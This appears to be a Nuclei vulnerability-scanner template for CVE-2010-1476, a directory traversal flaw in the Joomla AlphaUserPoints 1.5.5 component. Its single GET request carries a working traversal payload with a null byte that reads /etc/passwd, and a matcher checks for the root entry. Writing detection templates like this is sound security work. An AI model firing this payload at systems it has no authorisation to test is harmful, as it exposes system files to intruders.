nuclei-templates/http/cves/2010/CVE-2010-1476.yaml

42 lines
1.4 KiB
YAML

id: CVE-2010-1476
info:
name: Joomla! Component AlphaUserPoints 1.5.5 - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the AlphaUserPoints (com_alphauserpoints) component 1.5.5 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impacts via a .. (dot dot) in the view parameter to index.php.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/12150
- https://nvd.nist.gov/vuln/detail/CVE-2010-1476
- http://packetstormsecurity.org/1004-exploits/joomlaalphauserpoints-lfi.txt
- http://www.alphaplug.com/
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2010-1476
cwe-id: CWE-22
epss-score: 0.03527
epss-percentile: 0.90353
cpe: cpe:2.3:a:alphaplug:com_alphauserpoints:1.5.5:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: alphaplug
product: com_alphauserpoints
tags: joomla,lfi,edb,packetstorm,cve,cve2010
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200